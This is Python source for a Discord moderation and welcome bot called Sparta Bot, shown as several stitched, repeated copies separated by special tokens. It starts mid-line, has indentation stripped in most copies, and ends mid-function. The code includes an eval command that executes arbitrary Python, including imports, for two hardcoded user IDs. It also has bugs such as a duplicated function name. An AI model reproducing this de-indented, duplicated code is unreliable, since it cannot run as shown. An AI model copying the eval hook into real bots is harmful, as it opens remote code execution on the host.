f'Left - {guild.name}\nServer ID - {guild.id}\nOwner - {guild.owner}')
@bot.event
async def on_member_join(member):
guild: discord.Guild = member.guild
channels = guild.channels
if str(guild.id) not in Data.server_data:
Data.server_data[str(guild.id)] = Data.create_new_data()
data = Data.server_data[str(guild.id)]
print(f'{member} has joined {guild} server...')
join_role = guild.get_role(data['join_role'])
if join_role is not None:
await member.add_roles(join_role)
if data['welcome_msg'] is None:
server_wlcm_msg = (
f'Welcome, {member.mention}, to the Official **{guild.name}** Server'
)
else:
server_wlcm_msg = data['welcome_msg']
server_wlcm_msg = server_wlcm_msg.replace('[mention]',
f'{member.mention}')
wel_channel = None
if data['welcome_channel'] is None:
for channel in channels:
if str(channel).find('welcome') != -1:
wel_channel = channel
break
else:
wel_channel = guild.get_channel(int(data['welcome_channel']))
try:
await wel_channel.send(server_wlcm_msg)
except AttributeError:
print('DEBUG: No welcome channel has been set or found.')
@bot.command(name='remove_welcome', aliases=['rwel', 'remwel'])
@commands.has_guild_permissions(manage_guild=True)
async def remove_welcome(ctx, *, channel):
if str(ctx.guild.id) not in Data.server_data:
Data.server_data[str(ctx.guild.id)] = Data.create_new_data()
Data.server_data[str(ctx.guild.id)]['welcome_channel'] = channel
await ctx.send("This server's welcome channel has been removed")
@bot.event
async def on_member_remove(member):
guild = member.guild
channels = guild.channels
if str(guild.id) not in Data.server_data:
Data.server_data[str(guild.id)] = Data.create_new_data()
data = Data.server_data[str(guild.id)]
print(f'{member} has left the {guild.name}...')
if data['leave_msg'] is None:
server_leave_msg = (
f'Goodbye, **{str(member)}**, thank you for staying at **{guild.name}** Server'
)
else:
server_leave_msg = data['leave_msg']
server_leave_msg = server_leave_msg.replace('[member]', f'{member}')
lv_channel = None
if data['leave_channel'] is None:
for channel in channels:
if str(channel).find('bye') != -1 or str(channel).find('leave'
) != -1:
lv_channel = channel
break
else:
lv_channel = guild.get_channel(int(data['leave_channel']))
try:
await lv_channel.send(server_leave_msg)
except AttributeError:
print('DEBUG: No leave channel has been set or found.')
@bot.command(name='remove_leave', aliases=['rleave', 'remleave'])
@commands.has_guild_permissions(manage_guild=True)
async def remove_welcome(ctx, *, channel):
if str(ctx.guild.id) not in Data.server_data:
Data.server_data[str(ctx.guild.id)] = Data.create_new_data()
Data.server_data[str(ctx.guild.id)]['leave_channel'] = channel
await ctx.send("This server's leave channel has been Removed")
@bot.event
async def on_command_error(ctx, error):
try:
error = error.original
except Exception:
pass
if type(error) is discord.ext.commands.errors.CommandNotFound:
return
elif type(error) is discord.ext.commands.errors.BadArgument:
pass
elif type(error) is discord.ext.commands.errors.MissingRequiredArgument:
pass
elif type(error) is discord.ext.commands.errors.NoPrivateMessage:
pass
elif type(error) is discord.ext.commands.errors.MissingPermissions:
pass
elif type(error) is discord.ext.commands.errors.NotOwner:
pass
elif type(error) is discord.ext.commands.errors.CommandOnCooldown:
pass
elif type(error) is discord.ext.commands.errors.ChannelNotFound:
pass
elif type(error) is discord.ext.commands.errors.BadUnionArgument:
pass
elif type(error) is discord.ext.commands.errors.BotMissingPermissions:
pass
elif type(error) is discord.errors.Forbidden:
error = "I don't have permission to do that!"
else:
print(f'Error {type(error)}: {error}')
traceback.print_exception(type(error), error, error.__traceback__,
file=sys.stderr)
embed = discord.Embed(title='Error!', description=
'An unexpected error ocurred. Please report this to the dev.'
)
embed.add_field(name='Error Message:', value=
f'{type(error)}:\n{error}', inline=False)
await ctx.send(f'{error}')
def insert_returns(body):
if isinstance(body[-1], ast.Expr):
body[-1] = ast.Return(body[-1].value)
ast.fix_missing_locations(body[-1])
if isinstance(body[-1], ast.If):
insert_returns(body[-1].body)
insert_returns(body[-1].orelse)
if isinstance(body[-1], ast.With):
insert_returns(body[-1].body)
@bot.command(name='eval')
async def eval_fn(ctx, *, cmd):
"""Evaluates input.
Input is interpreted as newline seperated statements.
If the last statement is an expression, that is the return value.
Usable globals:
- `bot`: the bot instance
- `discord`: the discord module
- `commands`: the discord.ext.commands module
- `ctx`: the invokation context
- `__import__`: the builtin `__import__` function
Such that `>eval 1 + 1` gives `2` as the result.
The following invokation will cause the bot to send the text '9'
to the channel of invokation and return '3' as the result of evaluating
>eval ```
a = 1 + 2
b = a * 2
await ctx.send(a + b)
a
```
"""
if ctx.message.author.id not in [400857098121904149, 733532987794128897]:
await ctx.send('You are not authorized to run this command')
return
fn_name = '_eval_expr'
cmd = cmd.strip('` ')
cmd = '\n'.join(f' {i}' for i in cmd.splitlines())
body = f'async def {fn_name}():\n{cmd}'
parsed = ast.parse(body)
body = parsed.body[0].body
insert_returns(body)
env = {'bot': ctx.bot, 'discord': discord, 'commands': commands, 'ctx':
ctx, '__import__': __import__}
exec(compile(parsed, filename='<ast>', mode='exec'), env)
result = await eval(f'{fn_name}()', env)
await ctx.send(result)
@bot.command(name='data')
async def data(ctx):
is_owner = await bot.is_owner(ctx.author)
if is_owner or ctx.author.id == 733532987794128897:
data_file = discord.File('data.json')
await ctx.send(file=data_file)
@bot.event
async def on_message(message: discord.Message):
global previous_msg_sender_id
if message.author.bot:
return
author: discord.Member = message.author
channel: discord.TextChannel = message.channel
guild: discord.Guild = message.guild
await bot.process_commands(message)
if str(guild.id) not in Data.server_data:
Data.server_data[str(guild.id)] = Data.create_new_data()
data = Data.server_data[str(guild.id)]
if message.content.replace('!', '') == bot.user.mention:
pre = data['prefix']
await channel.send(f'The prefix in this server is `{pre}`')
for afk_user_entry in data['afks']:
afk_user_id = int(afk_user_entry['user'])
afk_reason = afk_user_entry['reason']
afk_user = guild.get_member(afk_user_id)
if afk_user.id == author.id and afk_user_id == previous_msg_sender_id:
Data.server_data[str(guild.id)]['afks'].remove(afk_user_entry)
await channel.send(f'**{afk_user}** is no longer AFK.')
elif afk_user in message.mentions:
await channel.send(
f'**{afk_user}** is currently AFK because **{afk_reason}**.')
if data['pay_respects'] and message.content.strip().lower() == 'f':
await channel.send(
f'**{author.display_name}** has paid their respects...')
if data['active'] and str(author.id) not in data['users']:
if not str(channel.id) in data['channels']:
perms = author.permissions_in(channel)
if not perms.administrator:
if ('http://' in message.content or 'https://' in message.
content):
if len(data['urls']) > 0:
for url in data['urls']:
if not url in message.content:
await channel.purge(limit=1)
msg1 = await channel.send(
f'{author.mention}, you are not allowed to send links in this channel.'
)
await asyncio.sleep(2)
await msg1.delete()
else:
await channel.purge(limit=1)
msg2 = await channel.send(
f'{author.mention}, you are not allowed to send links in this channel.'
)
await asyncio.sleep(3)
await msg2.delete()
elif len(message.attachments) > 0:
await channel.purge(limit=1)
msg3 = await channel.send(
f'{author.mention}, you are not allowed to send attachments in this channel.'
)
await asyncio.sleep(3)
await msg3.delete()
previous_msg_sender_id = author.id
bot.run(TOKEN)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
TOKEN = os.getenv('SPARTA_TOKEN')
intents = discord.Intents.default()
intents.members = True
def get_prefix(client, message):
if str(message.guild.id) not in Data.server_data:
Data.server_data[str(message.guild.id)] = Data.create_new_data()
data = Data.server_data[str(message.guild.id)]
return data['prefix']
PREFIX = get_prefix
bot = commands.Bot(command_prefix=PREFIX, description=
'I am Sparta Bot, a bot for the Official Sparta Gaming Discord server.',
intents=intents, help_command=None, case_insensitive=True)
THEME_COLOR = discord.Colour.blue()
bot.add_cog(Miscellaneous(bot, THEME_COLOR))
bot.add_cog(ServerSettings(bot, THEME_COLOR))
bot.add_cog(Moderator(bot, THEME_COLOR))
bot.add_cog(AutoMod(bot, THEME_COLOR))
bot.add_cog(Fun(bot, THEME_COLOR))
bot.add_cog(Google(bot, THEME_COLOR))
previous_msg_sender_id = None
@bot.event
async def on_ready():
bot.loop.create_task(Data.auto_update_data())
bot.loop.create_task(update_presence(bot, PREFIX))
print('Bot is ready...')
@bot.event
async def on_guild_join(guild):
log_channel = bot.get_channel(773580297954394162)
await log_channel.send(
f'Joined - {guild.name}\nServer ID - {guild.id}\nOwner - {guild.owner}'
)
@bot.event
async def on_guild_remove(guild):
log_channel = bot.get_channel(773580297954394162)
await log_channel.send(
f'Left - {guild.name}\nServer ID - {guild.id}\nOwner - {guild.owner}')
@bot.event
async def on_member_join(member):
guild: discord.Guild = member.guild
channels = guild.channels
if str(guild.id) not in Data.server_data:
Data.server_data[str(guild.id)] = Data.create_new_data()
data = Data.server_data[str(guild.id)]
print(f'{member} has joined {guild} server...')
join_role = guild.get_role(data['join_role'])
if join_role is not None:
await member.add_roles(join_role)
if data['welcome_msg'] is None:
server_wlcm_msg = (
f'Welcome, {member.mention}, to the Official **{guild.name}** Server'
)
else:
server_wlcm_msg = data['welcome_msg']
server_wlcm_msg = server_wlcm_msg.replace('[mention]',
f'{member.mention}')
wel_channel = None
if data['welcome_channel'] is None:
for channel in channels:
if str(channel).find('welcome') != -1:
wel_channel = channel
break
else:
wel_channel = guild.get_channel(int(data['welcome_channel']))
try:
await wel_channel.send(server_wlcm_msg)
except AttributeError:
print('DEBUG: No welcome channel has been set or found.')
@bot.command(name='remove_welcome', aliases=['rwel', 'remwel'])
@commands.has_guild_permissions(manage_guild=True)
async def remove_welcome(ctx, *, channel):
if str(ctx.guild.id) not in Data.server_data:
Data.server_data[str(ctx.guild.id)] = Data.create_new_data()
Data.server_data[str(ctx.guild.id)]['welcome_channel'] = channel
await ctx.send("This server's welcome channel has been removed")
@bot.event
async def on_member_remove(member):
guild = member.guild
channels = guild.channels
if str(guild.id) not in Data.server_data:
Data.server_data[str(guild.id)] = Data.create_new_data()
data = Data.server_data[str(guild.id)]
print(f'{member} has left the {guild.name}...')
if data['leave_msg'] is None:
server_leave_msg = (
f'Goodbye, **{str(member)}**, thank you for staying at **{guild.name}** Server'
)
else:
server_leave_msg = data['leave_msg']
server_leave_msg = server_leave_msg.replace('[member]', f'{member}')
lv_channel = None
if data['leave_channel'] is None:
for channel in channels:
if str(channel).find('bye') != -1 or str(channel).find('leave'
) != -1:
lv_channel = channel
break
else:
lv_channel = guild.get_channel(int(data['leave_channel']))
try:
await lv_channel.send(server_leave_msg)
except AttributeError:
print('DEBUG: No leave channel has been set or found.')
@bot.command(name='remove_leave', aliases=['rleave', 'remleave'])
@commands.has_guild_permissions(manage_guild=True)
async def remove_welcome(ctx, *, channel):
if str(ctx.guild.id) not in Data.server_data:
Data.server_data[str(ctx.guild.id)] = Data.create_new_data()
Data.server_data[str(ctx.guild.id)]['leave_channel'] = channel
await ctx.send("This server's leave channel has been Removed")
@bot.event
async def on_command_error(ctx, error):
try:
error = error.original
except Exception:
pass
if type(error) is discord.ext.commands.errors.CommandNotFound:
return
elif type(error) is discord.ext.commands.errors.BadArgument:
pass
elif type(error) is discord.ext.commands.errors.MissingRequiredArgument:
pass
elif type(error) is discord.ext.commands.errors.NoPrivateMessage:
pass
elif type(error) is discord.ext.commands.errors.MissingPermissions:
pass
elif type(error) is discord.ext.commands.errors.NotOwner:
pass
elif type(error) is discord.ext.commands.errors.CommandOnCooldown:
pass
elif type(error) is discord.ext.commands.errors.ChannelNotFound:
pass
elif type(error) is discord.ext.commands.errors.BadUnionArgument:
pass
elif type(error) is discord.ext.commands.errors.BotMissingPermissions:
pass
elif type(error) is discord.errors.Forbidden:
error = "I don't have permission to do that!"
else:
print(f'Error {type(error)}: {error}')
traceback.print_exception(type(error), error, error.__traceback__,
file=sys.stderr)
embed = discord.Embed(title='Error!', description=
'An unexpected error ocurred. Please report this to the dev.'
)
embed.add_field(name='Error Message:', value=
f'{type(error)}:\n{error}', inline=False)
await ctx.send(f'{error}')
def insert_returns(body):
if isinstance(body[-1], ast.Expr):
body[-1] = ast.Return(body[-1].value)
ast.fix_missing_locations(body[-1])
if isinstance(body[-1], ast.If):
insert_returns(body[-1].body)
insert_returns(body[-1].orelse)
if isinstance(body[-1], ast.With):
insert_returns(body[-1].body)
@bot.command(name='eval')
async def eval_fn(ctx, *, cmd):
"""Evaluates input.
Input is interpreted as newline seperated statements.
If the last statement is an expression, that is the return value.
Usable globals:
- `bot`: the bot instance
- `discord`: the discord module
- `commands`: the discord.ext.commands module
- `ctx`: the invokation context
- `__import__`: the builtin `__import__` function
Such that `>eval 1 + 1` gives `2` as the result.
The following invokation will cause the bot to send the text '9'
to the channel of invokation and return '3' as the result of evaluating
>eval ```
a = 1 + 2
b = a * 2
await ctx.send(a + b)
a
```
"""
if ctx.message.author.id not in [400857098121904149, 733532987794128897]:
await ctx.send('You are not authorized to run this command')
return
fn_name = '_eval_expr'
cmd = cmd.strip('` ')
cmd = '\n'.join(f' {i}' for i in cmd.splitlines())
body = f'async def {fn_name}():\n{cmd}'
parsed = ast.parse(body)
body = parsed.body[0].body
insert_returns(body)
env = {'bot': ctx.bot, 'discord': discord, 'commands': commands, 'ctx':
ctx, '__import__': __import__}
exec(compile(parsed, filename='<ast>', mode='exec'), env)
result = await eval(f'{fn_name}()', env)
await ctx.send(result)
@bot.command(name='data')
async def data(ctx):
is_owner = await bot.is_owner(ctx.author)
if is_owner or ctx.author.id == 733532987794128897:
data_file = discord.File('data.json')
await ctx.send(file=data_file)
@bot.event
async def on_message(message: discord.Message):
global previous_msg_sender_id
if message.author.bot:
return
author: discord.Member = message.author
channel: discord.TextChannel = message.channel
guild: discord.Guild = message.guild
await bot.process_commands(message)
if str(guild.id) not in Data.server_data:
Data.server_data[str(guild.id)] = Data.create_new_data()
data = Data.server_data[str(guild.id)]
if message.content.replace('!', '') == bot.user.mention:
pre = data['prefix']
await channel.send(f'The prefix in this server is `{pre}`')
for afk_user_entry in data['afks']:
afk_user_id = int(afk_user_entry['user'])
afk_reason = afk_user_entry['reason']
afk_user = guild.get_member(afk_user_id)
if afk_user.id == author.id and afk_user_id == previous_msg_sender_id:
Data.server_data[str(guild.id)]['afks'].remove(afk_user_entry)
await channel.send(f'**{afk_user}** is no longer AFK.')
elif afk_user in message.mentions:
await channel.send(
f'**{afk_user}** is currently AFK because **{afk_reason}**.')
if data['pay_respects'] and message.content.strip().lower() == 'f':
await channel.send(
f'**{author.display_name}** has paid their respects...')
if data['active'] and str(author.id) not in data['users']:
if not str(channel.id) in data['channels']:
perms = author.permissions_in(channel)
if not perms.administrator:
if ('http://' in message.content or 'https://' in message.
content):
if len(data['urls']) > 0:
for url in data['urls']:
if not url in message.content:
await channel.purge(limit=1)
msg1 = await channel.send(
f'{author.mention}, you are not allowed to send links in this channel.'
)
await asyncio.sleep(2)
await msg1.delete()
else:
await channel.purge(limit=1)
msg2 = await channel.send(
f'{author.mention}, you are not allowed to send links in this channel.'
)
await asyncio.sleep(3)
await msg2.delete()
elif len(message.attachments) > 0:
await channel.purge(limit=1)
msg3 = await channel.send(
f'{author.mention}, you are not allowed to send attachments in this channel.'
)
await asyncio.sleep(3)
await msg3.delete()
previous_msg_sender_id = author.id
bot.run(TOKEN)
<|reserved_special_token_1|>
import os
import subprocess
import discord
import asyncio
import traceback
import sys
import ast
from discord.ext import commands
from cogs.misc import Miscellaneous
from cogs.serversettings import ServerSettings
from cogs.mod import Moderator
from cogs.automod import AutoMod
from cogs.google import Google
from cogs.fun import Fun
from otherscipts.helpers import update_presence
from otherscipts.data import Data
TOKEN = os.getenv('SPARTA_TOKEN')
intents = discord.Intents.default()
intents.members = True
def get_prefix(client, message):
if str(message.guild.id) not in Data.server_data:
Data.server_data[str(message.guild.id)] = Data.create_new_data()
data = Data.server_data[str(message.guild.id)]
return data['prefix']
PREFIX = get_prefix
bot = commands.Bot(command_prefix=PREFIX, description=
'I am Sparta Bot, a bot for the Official Sparta Gaming Discord server.',
intents=intents, help_command=None, case_insensitive=True)
THEME_COLOR = discord.Colour.blue()
bot.add_cog(Miscellaneous(bot, THEME_COLOR))
bot.add_cog(ServerSettings(bot, THEME_COLOR))
bot.add_cog(Moderator(bot, THEME_COLOR))
bot.add_cog(AutoMod(bot, THEME_COLOR))
bot.add_cog(Fun(bot, THEME_COLOR))
bot.add_cog(Google(bot, THEME_COLOR))
previous_msg_sender_id = None
@bot.event
async def on_ready():
bot.loop.create_task(Data.auto_update_data())
bot.loop.create_task(update_presence(bot, PREFIX))
print('Bot is ready...')
@bot.event
async def on_guild_join(guild):
log_channel = bot.get_channel(773580297954394162)
await log_channel.send(
f'Joined - {guild.name}\nServer ID - {guild.id}\nOwner - {guild.owner}'
)
@bot.event
async def on_guild_remove(guild):
log_channel = bot.get_channel(773580297954394162)
await log_channel.send(
f'Left - {guild.name}\nServer ID - {guild.id}\nOwner - {guild.owner}')
@bot.event
async def on_member_join(member):
guild: discord.Guild = member.guild
channels = guild.channels
if str(guild.id) not in Data.server_data:
Data.server_data[str(guild.id)] = Data.create_new_data()
data = Data.server_data[str(guild.id)]
print(f'{member} has joined {guild} server...')
join_role = guild.get_role(data['join_role'])
if join_role is not None:
await member.add_roles(join_role)
if data['welcome_msg'] is None:
server_wlcm_msg = (
f'Welcome, {member.mention}, to the Official **{guild.name}** Server'
)
else:
server_wlcm_msg = data['welcome_msg']
server_wlcm_msg = server_wlcm_msg.replace('[mention]',
f'{member.mention}')
wel_channel = None
if data['welcome_channel'] is None:
for channel in channels:
if str(channel).find('welcome') != -1:
wel_channel = channel
break
else:
wel_channel = guild.get_channel(int(data['welcome_channel']))
try:
await wel_channel.send(server_wlcm_msg)
except AttributeError:
print('DEBUG: No welcome channel has been set or found.')
@bot.command(name='remove_welcome', aliases=['rwel', 'remwel'])
@commands.has_guild_permissions(manage_guild=True)
async def remove_welcome(ctx, *, channel):
if str(ctx.guild.id) not in Data.server_data:
Data.server_data[str(ctx.guild.id)] = Data.create_new_data()
Data.server_data[str(ctx.guild.id)]['welcome_channel'] = channel
await ctx.send("This server's welcome channel has been removed")
@bot.event
async def on_member_remove(member):
guild = member.guild
channels = guild.channels
if str(guild.id) not in Data.server_data:
Data.server_data[str(guild.id)] = Data.create_new_data()
data = Data.server_data[str(guild.id)]
print(f'{member} has left the {guild.name}...')
if data['leave_msg'] is None:
server_leave_msg = (
f'Goodbye, **{str(member)}**, thank you for staying at **{guild.name}** Server'
)
else:
server_leave_msg = data['leave_msg']
server_leave_msg = server_leave_msg.replace('[member]', f'{member}')
lv_channel = None
if data['leave_channel'] is None:
for channel in channels:
if str(channel).find('bye') != -1 or str(channel).find('leave'
) != -1:
lv_channel = channel
break
else:
lv_channel = guild.get_channel(int(data['leave_channel']))
try:
await lv_channel.send(server_leave_msg)
except AttributeError:
print('DEBUG: No leave channel has been set or found.')
@bot.command(name='remove_leave', aliases=['rleave', 'remleave'])
@commands.has_guild_permissions(manage_guild=True)
async def remove_welcome(ctx, *, channel):
if str(ctx.guild.id) not in Data.server_data:
Data.server_data[str(ctx.guild.id)] = Data.create_new_data()
Data.server_data[str(ctx.guild.id)]['leave_channel'] = channel
await ctx.send("This server's leave channel has been Removed")
@bot.event
async def on_command_error(ctx, error):
try:
error = error.original
except Exception:
pass
if type(error) is discord.ext.commands.errors.CommandNotFound:
return
elif type(error) is discord.ext.commands.errors.BadArgument:
pass
elif type(error) is discord.ext.commands.errors.MissingRequiredArgument:
pass
elif type(error) is discord.ext.commands.errors.NoPrivateMessage:
pass
elif type(error) is discord.ext.commands.errors.MissingPermissions:
pass
elif type(error) is discord.ext.commands.errors.NotOwner:
pass
elif type(error) is discord.ext.commands.errors.CommandOnCooldown:
pass
elif type(error) is discord.ext.commands.errors.ChannelNotFound:
pass
elif type(error) is discord.ext.commands.errors.BadUnionArgument:
pass
elif type(error) is discord.ext.commands.errors.BotMissingPermissions:
pass
elif type(error) is discord.errors.Forbidden:
error = "I don't have permission to do that!"
else:
print(f'Error {type(error)}: {error}')
traceback.print_exception(type(error), error, error.__traceback__,
file=sys.stderr)
embed = discord.Embed(title='Error!', description=
'An unexpected error ocurred. Please report this to the dev.'
)
embed.add_field(name='Error Message:', value=
f'{type(error)}:\n{error}', inline=False)
await ctx.send(f'{error}')
def insert_returns(body):
if isinstance(body[-1], ast.Expr):
body[-1] = ast.Return(body[-1].value)
ast.fix_missing_locations(body[-1])
if isinstance(body[-1], ast.If):
insert_returns(body[-1].body)
insert_returns(body[-1].orelse)
if isinstance(body[-1], ast.With):
insert_returns(body[-1].body)
@bot.command(name='eval')
async def eval_fn(ctx, *, cmd):
"""Evaluates input.
Input is interpreted as newline seperated statements.
If the last statement is an expression, that is the return value.
Usable globals:
- `bot`: the bot instance
- `discord`: the discord module
- `commands`: the discord.ext.commands module
- `ctx`: the invokation context
- `__import__`: the builtin `__import__` function
Such that `>eval 1 + 1` gives `2` as the result.
The following invokation will cause the bot to send the text '9'
to the channel of invokation and return '3' as the result of evaluating
>eval ```
a = 1 + 2
b = a * 2
await ctx.send(a + b)
a
```
"""
if ctx.message.author.id not in [400857098121904149, 733532987794128897]:
await ctx.send('You are not authorized to run this command')
return
fn_name = '_eval_expr'
cmd = cmd.strip('` ')
cmd = '\n'.join(f' {i}' for i in cmd.splitlines())
body = f'async def {fn_name}():\n{cmd}'
parsed = ast.parse(body)
body = parsed.body[0].body
insert_returns(body)
env = {'bot': ctx.bot, 'discord': discord, 'commands': commands, 'ctx':
ctx, '__import__': __import__}
exec(compile(parsed, filename='<ast>', mode='exec'), env)
result = await eval(f'{fn_name}()', env)
await ctx.send(result)
@bot.command(name='data')
async def data(ctx):
is_owner = await bot.is_owner(ctx.author)
if is_owner or ctx.author.id == 733532987794128897:
data_file = discord.File('data.json')
await ctx.send(file=data_file)
@bot.event
async def on_message(message: discord.Message):
global previous_msg_sender_id
if message.author.bot:
return
author: discord.Member = message.author
channel: discord.TextChannel = message.channel
guild: discord.Guild = message.guild
await bot.process_commands(message)
if str(guild.id) not in Data.server_data:
Data.server_data[str(guild.id)] = Data.create_new_data()
data = Data.server_data[str(guild.id)]
if message.content.replace('!', '') == bot.user.mention:
pre = data['prefix']
await channel.send(f'The prefix in this server is `{pre}`')
for afk_user_entry in data['afks']:
afk_user_id = int(afk_user_entry['user'])
afk_reason = afk_user_entry['reason']
afk_user = guild.get_member(afk_user_id)
if afk_user.id == author.id and afk_user_id == previous_msg_sender_id:
Data.server_data[str(guild.id)]['afks'].remove(afk_user_entry)
await channel.send(f'**{afk_user}** is no longer AFK.')
elif afk_user in message.mentions:
await channel.send(
f'**{afk_user}** is currently AFK because **{afk_reason}**.')
if data['pay_respects'] and message.content.strip().lower() == 'f':
await channel.send(
f'**{author.display_name}** has paid their respects...')
if data['active'] and str(author.id) not in data['users']:
if not str(channel.id) in data['channels']:
perms = author.permissions_in(channel)
if not perms.administrator:
if ('http://' in message.content or 'https://' in message.
content):
if len(data['urls']) > 0:
for url in data['urls']:
if not url in message.content:
await channel.purge(limit=1)
msg1 = await channel.send(
f'{author.mention}, you are not allowed to send links in this channel.'
)
await asyncio.sleep(2)
await msg1.delete()
else:
await channel.purge(limit=1)
msg2 = await channel.send(
f'{author.mention}, you are not allowed to send links in this channel.'
)
await asyncio.sleep(3)
await msg2.delete()
elif len(message.attachments) > 0:
await channel.purge(limit=1)
msg3 = await channel.send(
f'{author.mention}, you are not allowed to send attachments in this channel.'
)
await asyncio.sleep(3)
await msg3.delete()
previous_msg_sender_id = author.id
bot.run(TOKEN)
<|reserved_special_token_1|>
import os
import subprocess
import discord
import asyncio
import traceback
import sys
import ast
from discord.ext import commands
# Import Cogs
from cogs.misc import Miscellaneous
from cogs.serversettings import ServerSettings
from cogs.mod import Moderator
from cogs.automod import AutoMod
from cogs.google import Google
# Minigame/Fun Cogs
from cogs.fun import Fun
#from cogs.hangman import Hangman
#from cogs.rps import RockPaperScissors
from otherscipts.helpers import update_presence
from otherscipts.data import Data
TOKEN = os.getenv('SPARTA_TOKEN')
intents = discord.Intents.default()
intents.members = True
def get_prefix(client, message):
if str(message.guild.id) not in Data.server_data:
Data.server_data[str(message.guild.id)] = Data.create_new_data()
data = Data.server_data[str(message.guild.id)]
return data["prefix"]
PREFIX = get_prefix
bot = commands.Bot(
command_prefix=PREFIX,
description="I am Sparta Bot, a bot for the Official Sparta Gaming Discord server.",
intents=intents,
help_command=None,
case_insensitive=True
)
THEME_COLOR = discord.Colour.blue()
# Add Cogs
bot.add_cog(Miscellaneous(bot, THEME_COLOR))
bot.add_cog(ServerSettings(bot, THEME_COLOR))
bot.add_cog(Moderator(bot, THEME_COLOR))
bot.add_cog(AutoMod(bot, THEME_COLOR))
bot.add_cog(Fun(bot, THEME_COLOR))
bot.add_cog(Google(bot, THEME_COLOR))
#bot.add_cog(Hangman(bot, THEME_COLOR))
#bot.add_cog(RockPaperScissors(bot, THEME_COLOR))
previous_msg_sender_id = None
@bot.event
async def on_ready():
bot.loop.create_task(Data.auto_update_data())
bot.loop.create_task(update_presence(bot, PREFIX))
print("Bot is ready...")
@bot.event
async def on_guild_join(guild):
log_channel = bot.get_channel(773580297954394162)
await log_channel.send(f"Joined - {guild.name}\nServer ID - {guild.id}\nOwner - {guild.owner}")
@bot.event
async def on_guild_remove(guild):
log_channel = bot.get_channel(773580297954394162)
await log_channel.send(f"Left - {guild.name}\nServer ID - {guild.id}\nOwner - {guild.owner}")
@bot.event
async def on_member_join(member):
guild: discord.Guild = member.guild
channels = guild.channels
if str(guild.id) not in Data.server_data:
Data.server_data[str(guild.id)] = Data.create_new_data()
data = Data.server_data[str(guild.id)]
print(f"{member} has joined {guild} server...")
join_role = guild.get_role(data["join_role"])
if join_role is not None:
await member.add_roles(join_role)
# Welcome Message
if data["welcome_msg"] is None:
server_wlcm_msg = f"Welcome, {member.mention}, to the Official **{guild.name}** Server"
else:
server_wlcm_msg = data["welcome_msg"]
server_wlcm_msg = server_wlcm_msg.replace(
"[mention]", f"{member.mention}")
# Welcome Channel
wel_channel = None
if data["welcome_channel"] is None:
for channel in channels:
if str(channel).find("welcome") != -1:
wel_channel = channel
break
else:
wel_channel = guild.get_channel(int(data["welcome_channel"]))
try:
await wel_channel.send(server_wlcm_msg)
except AttributeError:
print("DEBUG: No welcome channel has been set or found.")
#Remove welcome channel
@bot.command(name="remove_welcome", aliases=['rwel', 'remwel'])
@commands.has_guild_permissions(manage_guild=True)
async def remove_welcome(ctx, *, channel):
if str(ctx.guild.id) not in Data.server_data:
Data.server_data[str(ctx.guild.id)] = Data.create_new_data()
Data.server_data[str(ctx.guild.id)]["welcome_channel"] = channel
await ctx.send("This server's welcome channel has been removed")
@bot.event
async def on_member_remove(member):
guild = member.guild
channels = guild.channels
if str(guild.id) not in Data.server_data:
Data.server_data[str(guild.id)] = Data.create_new_data()
data = Data.server_data[str(guild.id)]
print(f"{member} has left the {guild.name}...")
# Leave Message
if data["leave_msg"] is None:
server_leave_msg = f"Goodbye, **{str(member)}**, thank you for staying at **{guild.name}** Server"
else:
server_leave_msg = data["leave_msg"]
server_leave_msg = server_leave_msg.replace("[member]", f"{member}")
# Leave Channel
lv_channel = None
if data["leave_channel"] is None:
for channel in channels:
if str(channel).find("bye") != -1 or str(channel).find("leave") != -1:
lv_channel = channel
break
else:
lv_channel = guild.get_channel(int(data["leave_channel"]))
try:
await lv_channel.send(server_leave_msg)
except AttributeError:
print("DEBUG: No leave channel has been set or found.")
#Remove leave
@bot.command(name="remove_leave", aliases=['rleave', 'remleave'])
@commands.has_guild_permissions(manage_guild=True)
async def remove_welcome( ctx, *, channel):
if str(ctx.guild.id) not in Data.server_data:
Data.server_data[str(ctx.guild.id)] = Data.create_new_data()
Data.server_data[str(ctx.guild.id)]["leave_channel"] = channel
await ctx.send("This server's leave channel has been Removed")
@bot.event
async def on_command_error(ctx, error):
try:
error = error.original
except Exception:
pass
if type(error) is discord.ext.commands.errors.CommandNotFound:
return
elif type(error) is discord.ext.commands.errors.BadArgument:
pass
elif type(error) is discord.ext.commands.errors.MissingRequiredArgument:
pass
elif type(error) is discord.ext.commands.errors.NoPrivateMessage:
pass
elif type(error) is discord.ext.commands.errors.MissingPermissions:
pass
elif type(error) is discord.ext.commands.errors.NotOwner:
pass
elif type(error) is discord.ext.commands.errors.CommandOnCooldown:
pass
elif type(error) is discord.ext.commands.errors.ChannelNotFound:
pass
elif type(error) is discord.ext.commands.errors.BadUnionArgument:
pass
elif type(error) is discord.ext.commands.errors.BotMissingPermissions:
pass
elif type(error) is discord.errors.Forbidden:
error = "I don't have permission to do that!"
else:
print(f"Error {type(error)}: {error}")
traceback.print_exception(
type(error), error, error.__traceback__, file=sys.stderr
)
embed = discord.Embed(
title='Error!',
description='An unexpected error ocurred.\
Please report this to the dev.',
)
embed.add_field(
name='Error Message:',
value=f"{type(error)}:\n{error}",
inline=False
)
await ctx.send(f"{error}")
# LABEL: Programming Commands
def insert_returns(body):
# insert return stmt if the last expression is a expression statement
if isinstance(body[-1], ast.Expr):
body[-1] = ast.Return(body[-1].value)
ast.fix_missing_locations(body[-1])
# for if statements, we insert returns into the body and the orelse
if isinstance(body[-1], ast.If):
insert_returns(body[-1].body)
insert_returns(body[-1].orelse)
# for with blocks, again we insert returns into the body
if isinstance(body[-1], ast.With):
insert_returns(body[-1].body)
@bot.command(name='eval')
async def eval_fn(ctx, *, cmd):
"""Evaluates input.
Input is interpreted as newline seperated statements.
If the last statement is an expression, that is the return value.
Usable globals:
- `bot`: the bot instance
- `discord`: the discord module
- `commands`: the discord.ext.commands module
- `ctx`: the invokation context
- `__import__`: the builtin `__import__` function
Such that `>eval 1 + 1` gives `2` as the result.
The following invokation will cause the bot to send the text '9'
to the channel of invokation and return '3' as the result of evaluating
>eval ```
a = 1 + 2
b = a * 2
await ctx.send(a + b)
a
```
"""
if ctx.message.author.id not in [400857098121904149, 733532987794128897]:
await ctx.send("You are not authorized to run this command")
return
fn_name = "_eval_expr"
cmd = cmd.strip("` ")
# add a layer of indentation
cmd = "\n".join(f" {i}" for i in cmd.splitlines())
# wrap in async def body
body = f"async def {fn_name}():\n{cmd}"
parsed = ast.parse(body)
body = parsed.body[0].body
insert_returns(body)
env = {
'bot': ctx.bot,
'discord': discord,
'commands': commands,
